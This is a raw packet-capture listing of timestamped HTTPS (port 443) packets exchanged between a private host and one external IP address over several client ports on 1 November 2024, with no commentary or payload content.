Nov 1, 2024 20:58:28.928056002 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.928075075 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.928075075 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.928257942 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.936669111 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.936732054 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.936933041 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.936933041 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.936985016 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.937009096 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.937199116 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.951415062 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.951472044 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.951615095 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.951615095 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.951679945 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.951679945 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.951708078 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.951731920 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.951731920 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.951970100 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.968976974 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.969037056 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.969209909 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.969209909 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.969209909 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.969209909 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.969281912 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.969319105 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.969319105 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.969506025 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.987586975 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.987646103 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.987801075 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.987801075 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.987915993 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.987950087 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.988147020 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:29.001648903 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:29.001679897 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:29.001868010 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:29.001868010 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:29.001900911 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:29.001915932 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:29.001975060 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:29.001975060 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:29.002095938 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:29.017240047 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:29.017266989 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:29.017487049 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:29.017487049 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:29.017512083 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:29.017575979 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:29.017657042 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:29.035429001 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:29.035485983 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:29.035696983 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:29.035696983 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:29.035758018 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:29.035792112 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:29.035792112 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:29.035964966 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:29.040405035 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:29.040576935 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:29.040606976 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:29.040651083 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:29.040651083 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:29.040745020 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:29.040813923 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:29.040813923 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:29.040873051 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:29.041115046 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:29.041352034 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:29.041433096 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:29.041650057 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:29.041800976 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:29.041857958 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:29.415406942 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:29.415606022 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:29.416100025 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:29.416145086 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:29.418978930 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:29.419023037 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.010942936 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.011001110 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.011042118 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.011132002 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.011173010 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.011173010 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.011198997 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.011221886 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.011281013 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.011372089 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.094540119 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.094599962 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.094755888 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.094755888 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.094815016 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.094845057 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.094845057 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.094845057 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.094986916 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.214749098 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.214807987 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.214941978 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.214941978 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.215002060 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.215002060 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.215002060 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.215002060 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.215002060 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.215002060 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.215002060 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.215046883 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.215070963 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.215254068 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.296761990 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.296819925 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.297015905 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.297017097 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.297080994 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.297111034 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.297307014 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.359112978 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.359179020 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.359307051 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.359307051 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.359373093 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.359373093 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.359405994 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.359435081 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.359435081 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.359435081 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.359597921 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.404076099 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.404133081 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.404288054 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.404288054 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.404354095 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.404354095 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.404382944 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.404417992 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.404566050 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.440777063 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.440836906 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.441024065 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.441025019 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.441091061 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.441112995 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.441395998 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.474736929 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.474796057 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.474997997 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.474997997 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.474997997 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.474997997 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.475063086 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.475087881 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.475343943 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.510366917 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.510427952 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.510607958 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.510607958 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.510607958 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.510607958 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.510673046 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.510698080 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.510911942 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.546165943 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.546224117 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.546418905 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.546420097 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.546478987 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.546514034 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.546514034 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.546744108 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.575927973 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.576025009 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.576174021 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.576174021 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.576234102 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.576267958 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.576267958 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.576433897 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.597326040 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.597383976 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.597903013 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.597954988 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.597973108 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.598149061 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.617961884 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.618019104 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.618194103 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.618194103 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.618242979 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.618242979 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.618269920 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.618300915 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.618457079 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.635617018 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.635674000 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.635823011 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.635823965 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.635890961 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.635910034 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.635910034 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.636135101 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.653390884 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.653451920 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.653606892 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.653606892 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.653656960 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.653657913 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.653657913 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.653657913 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.653693914 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.653923035 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.666748047 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.666925907 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.666971922 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.666982889 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.666982889 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.667049885 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.667124033 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.667171955 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.667236090 CET	58988	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.667284966 CET	443	58988	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.667730093 CET	58989	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.667808056 CET	443	58989	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:30.667951107 CET	58989	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.668123007 CET	58989	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:30.668174028 CET	443	58989	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:31.043483019 CET	443	58989	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:31.043649912 CET	58989	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:31.043941975 CET	58989	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:31.043987989 CET	443	58989	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:31.045039892 CET	58989	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:31.045094013 CET	443	58989	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:31.638807058 CET	443	58989	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:31.638865948 CET	443	58989	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:31.638910055 CET	443	58989	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:31.638958931 CET	58989	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:31.639108896 CET	58989	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:31.639162064 CET	443	58989	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:31.639194012 CET	58989	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:31.639446974 CET	58989	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:31.722430944 CET	443	58989	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:31.722486973 CET	443	58989	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:31.722603083 CET	58989	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:31.722664118 CET	58989	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:31.722695112 CET	443	58989	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:31.722806931 CET	58989	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:31.722955942 CET	58989	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:31.841152906 CET	443	58989	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:31.841233015 CET	443	58989	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:31.841415882 CET	58989	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:31.841415882 CET	58989	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:31.841471910 CET	443	58989	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:31.841547966 CET	58989	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:31.841720104 CET	58989	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:31.923144102 CET	443	58989	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:31.923202038 CET	443	58989	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:31.923434973 CET	58989	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:31.923434973 CET	58989	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:31.923491955 CET	443	58989	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:31.923604965 CET	58989	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:31.923774958 CET	58989	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:31.976910114 CET	443	58989	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:31.977077007 CET	443	58989	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:31.977112055 CET	443	58989	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:31.977169991 CET	58989	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:31.977356911 CET	58989	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:31.977593899 CET	58989	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:31.977648973 CET	443	58989	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:31.978048086 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:31.978113890 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:31.978257895 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:31.978414059 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:31.978444099 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:32.353902102 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:32.354170084 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:32.354640961 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:32.354671001 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:32.355797052 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:32.355825901 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:32.949314117 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:32.949393034 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:32.949467897 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:32.949534893 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:32.949594021 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:32.949594021 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:32.949626923 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:32.949661016 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:32.949719906 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:32.949790955 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:32.949790955 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.034967899 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.035059929 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.035139084 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.035139084 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.035202980 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.035203934 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.035233021 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.035326004 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.035391092 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.152650118 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.152708054 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.152861118 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.152861118 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.152928114 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.152928114 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.152928114 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.152928114 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.152966022 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.153000116 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.153196096 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.232681036 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.232693911 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.232891083 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.232891083 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.232904911 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.233010054 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.233071089 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.296441078 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.296506882 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.296670914 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.296672106 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.296730995 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.296766996 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.296984911 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.341358900 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.341428041 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.341624022 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.341624022 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.341682911 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.341722012 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.341722965 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.341890097 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:33.377748013 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:33.377830029 CET	443	58990	188.245.203.37	192.168.11.20
